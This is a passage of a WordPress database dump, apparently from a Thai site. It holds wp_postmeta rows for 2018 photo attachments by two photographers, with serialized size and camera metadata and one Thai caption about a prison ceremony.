(9938, 4507, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/90-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"90-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"90-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"90-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"90-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"90-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1484935935\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9939, 4508, '_wp_attached_file', '2018/11/94-Chanklang-Kanthong-copy.jpg'),
(9940, 4508, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/94-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"94-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"94-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"94-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"94-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"94-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478983222\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9941, 4509, '_wp_attached_file', '2018/11/98-Chanklang-Kanthong-copy.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(9942, 4509, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/98-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"98-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"98-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"98-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"98-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"98-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477052538\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9943, 4510, '_wp_attached_file', '2018/11/99-Chanklang-Kanthong-copy.jpg'),
(9944, 4510, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2018/11/99-Chanklang-Kanthong-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"99-Chanklang-Kanthong-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"99-Chanklang-Kanthong-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"99-Chanklang-Kanthong-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"99-Chanklang-Kanthong-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"99-Chanklang-Kanthong-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481527743\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:9:\"0.0003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9945, 4514, '_edit_lock', '1542252474:3'),
(9946, 4514, '_edit_last', '3'),
(9947, 4516, '_wp_attached_file', '2018/11/ประกาศ-ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว-ทำหน้าที่ธุรการ-จำนวน-๓-อัตรา.pdf'),
(9951, 4514, '_hide_featured', NULL),
(9952, 4514, '_yoast_wpseo_content_score', '60'),
(9953, 4514, '_yoast_wpseo_primary_category', '3'),
(9954, 4514, '_wpas_done_all', '1'),
(9955, 4514, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575672399;s:7:\"payload\";a:0:{}}}'),
(9962, 4536, '_wp_attached_file', '2018/11/8-Roengchai-Kongmuang-copy.jpg'),
(9963, 4536, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1200;s:4:\"file\";s:38:\"2018/11/8-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"8-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"8-Roengchai-Kongmuang-copy-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"8-Roengchai-Kongmuang-copy-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"8-Roengchai-Kongmuang-copy-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:38:\"8-Roengchai-Kongmuang-copy-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477062939\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9964, 4537, '_wp_attached_file', '2018/11/20-Roengchai-Kongmuang-copy.jpg'),
(9965, 4537, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/20-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"20-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"20-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"20-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"20-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"20-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477477329\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9966, 4538, '_wp_attached_file', '2018/11/39-Roengchai-Kongmuang-copy.jpg'),
(9967, 4538, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/39-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"39-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"39-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"39-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"39-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"39-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477577190\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:2:\"64\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9968, 4539, '_wp_attached_file', '2018/11/49-Roengchai-Kongmuang-copy.jpg'),
(9969, 4539, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/49-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"49-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"49-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"49-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"49-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"49-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:31:\"เริงชัย คงเ\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:548:\"ผู้ต้องขัง 3,617 คน ร่วมกันแปรอักษรแสดงสัญลักษณ์ กราบสักการะ และขับร้อง 9 บทเพลงถวายพ่อ ซึ่งจัดขึ้นที่ทัณฑสถานวัยหนุ่มกลาง จ. ปทุมธานี โดยมีนายณรงค์ศักดิ์ สมพัศ ผู้อำนวยการร่วมขับร้องและเป็นประธาน\";s:17:\"created_timestamp\";s:10:\"1477578098\";s:9:\"copyright\";s:58:\"©เริงชัย คงเมือง/สวสส\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:63:\"ผู้ต้องขังกราบสักการะ\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:5:{i:0;s:18:\"นักโทษ\";i:1;s:21:\"เรือนจำ\";i:2;s:24:\"แปรอักษร\";i:3;s:30:\"ผู้ต้องขัง\";i:4;s:24:\"ปทุมธานี\";}}}'),
(9970, 4540, '_wp_attached_file', '2018/11/58-Roengchai-Kongmuang-copy.jpg'),
(9971, 4540, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/58-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"58-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"58-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"58-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"58-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"58-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477850943\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:4:\"4000\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9972, 4541, '_wp_attached_file', '2018/11/65-Roengchai-Kongmuang-copy.jpg'),
(9973, 4541, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/65-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"65-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"65-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"65-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"65-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"65-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477155192\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9974, 4542, '_wp_attached_file', '2018/11/69-Roengchai-Kongmuang-copy.jpg'),
(9975, 4542, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/69-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"69-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"69-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"69-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"69-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"69-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476911186\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9976, 4543, '_wp_attached_file', '2018/11/78-Roengchai-Kongmuang-copy.jpg'),
(9977, 4543, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/78-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"78-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"78-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"78-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"78-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"78-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481992173\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9978, 4544, '_wp_attached_file', '2018/11/80-Roengchai-Kongmuang-copy.jpg'),
(9979, 4544, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/80-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"80-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"80-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"80-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"80-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"80-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"14\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477476711\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"53\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9980, 4545, '_wp_attached_file', '2018/11/92-Roengchai-Kongmuang-copy.jpg'),
(9981, 4545, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2018/11/92-Roengchai-Kongmuang-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"92-Roengchai-Kongmuang-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"92-Roengchai-Kongmuang-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"92-Roengchai-Kongmuang-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"92-Roengchai-Kongmuang-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"92-Roengchai-Kongmuang-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477574271\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9982, 4546, '_wp_attached_file', '2018/11/93-Roengchai-Kongmuang-copy.jpg'),
